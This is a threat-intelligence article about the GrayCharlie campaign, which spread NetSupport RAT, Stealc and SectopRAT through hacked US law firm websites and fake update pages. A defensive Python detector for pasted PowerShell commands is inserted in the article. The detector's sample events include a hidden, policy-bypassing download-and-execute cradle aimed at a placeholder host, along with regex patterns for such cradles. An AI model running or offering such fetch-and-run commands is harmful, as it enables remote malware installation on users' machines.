US Law Firm Websites Hacked to Distribute Malware and Ransomware Threats


GrayCharlie Threat Operation

A financially motivated threat operation, known as GrayCharlie, has been identified as leveraging compromised websites of US law firms to spread various malware strains.

Compromised Law Firm Websites

The campaign, which has been linked to the SmartApeSG operation, involves the use of hacked WordPress sites to deploy NetSupport RAT, Stealc, and SectopRAT payloads.

According to an analysis by Recorded Future’s Insikt Group, the compromised law firm sites were breached through a shared IT or marketing provider.

Attack Vector

The attackers injected malicious links into the websites, which redirected visitors to fake browser update pages or CAPTCHAs. These pages tricked users into executing a PowerShell command through the Windows Run dialog, resulting in the installation of NetSupport RAT.

Post-Infection Activity

Once installed, NetSupport RAT established a connection with GrayCharlie’s command-and-control servers, enabling the threat actors to conduct surveillance, perform file operations, and deliver additional malware, including the Stealc infostealer and SectopRAT.

Infrastructure

The attack infrastructure supporting GrayCharlie is hosted by MivoCloud and HZ Hosting Ltd.

Mitigation and Recommendations

To mitigate the threat posed by GrayCharlie, researchers recommend blocking IP addresses and domains associated with NetSupport RAT, Stealc, and SectopRAT. Additionally, organizations should implement updated YARA, Sigma, and Snort rules, as well as enhance their web filtering mechanisms.
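The initial-access step described under Attack Vector (a PowerShell one-liner pasted into the Windows Run dialog) leaves a recognisable trace in process-creation telemetry: powershell.exe with explorer.exe as its parent and lure-style switches on the command line. The detection logic below is an added example, not code from Recorded Future or from the article; the Sysmon-style events and the example.invalid URL are constructed, and the indicator regexes and two-hit threshold are my own assumptions, not a published rule.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/u | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Date"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ep bypass -File C:\\Scripts\\inventory.ps1"},
    {"ParentImage": r"C:\Program Files\Git\bin\sh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -ep bypass -c "iwr http://example.invalid/u | iex"'},
]

# Indicators typical of a pasted one-liner. PowerShell accepts abbreviated
# switches (-w for -WindowStyle, -ep for -ExecutionPolicy), hence the prefixes.
INDICATORS = {
    "hidden_window": re.compile(r"(?i)-w[a-z]*\s+hidden\b"),
    "execution_policy_bypass": re.compile(r"(?i)-e[a-z]*\s+bypass\b"),
    "encoded_command": re.compile(r"(?i)-e[a-z]*\s+[A-Za-z0-9+/=]{20,}"),
    "download_cradle": re.compile(r"(?i)\b(iwr|invoke-webrequest|downloadstring|invoke-expression|iex)\b"),
}

def from_run_dialog(event):
    """Commands typed into Win+R are spawned with explorer.exe as the parent."""
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    child = event["Image"].lower().rsplit("\\", 1)[-1]
    return parent == "explorer.exe" and child in ("powershell.exe", "pwsh.exe")

def classify(event):
    """Return the matched indicator names, or [] when the event looks benign."""
    if not from_run_dialog(event):
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    # Require two or more indicators: a single flag is common admin usage.
    return hits if len(hits) >= 2 else []

def scan(events):
    """Return only the events that classify() flags."""
    return [e for e in events if classify(e)]

if __name__ == "__main__":
    for e in scan(SAMPLE_EVENTS):
        print("ALERT:", e["CommandLine"])
```

The same parent/child and command-line conditions translate directly into a Sigma process_creation rule if you prefer to ship it in that form.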

Conclusion

The GrayCharlie operation highlights the risks associated with supply chain attacks, where compromised third-party providers can be used to spread malware to multiple organizations. Law firms and other organizations are advised to be vigilant in monitoring their websites and networks for signs of compromise and to implement robust security measures to prevent such attacks.
